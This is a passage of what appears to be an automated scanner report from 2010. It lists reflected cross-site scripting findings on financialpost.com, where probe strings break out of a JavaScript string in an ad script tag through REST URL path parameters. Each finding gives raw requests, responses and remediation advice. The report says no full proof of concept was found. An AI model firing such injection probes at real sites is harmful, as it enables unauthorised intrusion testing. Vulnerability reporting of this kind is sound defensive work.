This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive86b9c'%3bbb1481860ca/Discover+your+true+competitive+advantage/3992781/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74233
Expires: Sun, 19 Dec 2010 03:12:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive86b9c';bb1481860ca/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive86b9c';bb1481860ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32248287?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e36a'%3b760d8d1d1a9 was submitted in the REST URL parameter 3. This input was echoed as 7e36a';760d8d1d1a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/39927817e36a'%3b760d8d1d1a9/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70169
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover-your-true-competitive-advantage/39927817e36a';760d8d1d1a9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover-your-true-competitive-advantage;kw=39927817e36a';760d8d1d1a9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c91c'%3bb0f449f0d2e was submitted in the REST URL parameter 4. This input was echoed as 1c91c';b0f449f0d2e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/3992781/1c91c'%3bb0f449f0d2e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38647
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3dfa'%3bc1a1cb098d5 was submitted in the REST URL parameter 1. This input was echoed as b3dfa';c1a1cb098d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb3dfa'%3bc1a1cb098d5/Leadership+companies+honest+with+their+employees/3987151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74644
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb3dfa';c1a1cb098d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb3dfa';c1a1cb098d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83962964?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43db7'%3b7532e4f4caa was submitted in the REST URL parameter 3. This input was echoed as 43db7';7532e4f4caa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/398715143db7'%3b7532e4f4caa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71329
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-companies-honest-with-their-employees/398715143db7';7532e4f4caa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-companies-honest-with-their-employees;kw=398715143db7';7532e4f4caa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f5d'%3bbfa9b0eb109 was submitted in the REST URL parameter 4. This input was echoed as 69f5d';bfa9b0eb109 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/3987151/69f5d'%3bbfa9b0eb109 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44711
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7cd1'%3b8a87ca5dda7 was submitted in the REST URL parameter 1. This input was echoed as a7cd1';8a87ca5dda7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executivea7cd1'%3b8a87ca5dda7/Leadership+make+good+decisions/3957410/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79991
Expires: Sun, 19 Dec 2010 03:12:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executivea7cd1';8a87ca5dda7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executivea7cd1';8a87ca5dda7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33160721?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea152'%3b5875384a269 was submitted in the REST URL parameter 3. This input was echoed as ea152';5875384a269 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410ea152'%3b5875384a269/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69799
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-make-good-decisions/3957410ea152';5875384a269/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-make-good-decisions;kw=3957410ea152';5875384a269;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'%3b92563dfa8ca was submitted in the REST URL parameter 4. This input was echoed as bacb0';92563dfa8ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410/bacb0'%3b92563dfa8ca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45046
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae28c'%3bc70cc79a0a1 was submitted in the REST URL parameter 1. This input was echoed as ae28c';c70cc79a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveae28c'%3bc70cc79a0a1/Organizations+fight+bureaucracy/3992875/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 88315
Expires: Sun, 19 Dec 2010 03:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveae28c';c70cc79a0a1/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveae28c';c70cc79a0a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99274053?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c87f'%3bc33c1d433bd was submitted in the REST URL parameter 3. This input was echoed as 2c87f';c33c1d433bd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/39928752c87f'%3bc33c1d433bd/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63883
Expires: Sun, 19 Dec 2010 03:12:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations-fight-bureaucracy/39928752c87f';c33c1d433bd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations-fight-bureaucracy;kw=39928752c87f';c33c1d433bd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'or
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c799'%3bc87820a0f13 was submitted in the REST URL parameter 4. This input was echoed as 2c799';c87820a0f13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/3992875/2c799'%3bc87820a0f13 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b293e'%3b061095bc4ca was submitted in the REST URL parameter 1. This input was echoed as b293e';061095bc4ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb293e'%3b061095bc4ca/canadian-mba-programs/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43656
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8f55'%3bcca8fb45330 was submitted in the REST URL parameter 2. This input was echoed as e8f55';cca8fb45330 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/canadian-mba-programse8f55'%3bcca8fb45330/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44440
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aba'%3bb9fb836393d was submitted in the REST URL parameter 1. This input was echoed as 98aba';b9fb836393d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive98aba'%3bb9fb836393d/ceo/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37452
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9721'%3b486d1a1eccd was submitted in the REST URL parameter 2. This input was echoed as e9721';486d1a1eccd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/ceoe9721'%3b486d1a1eccd/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
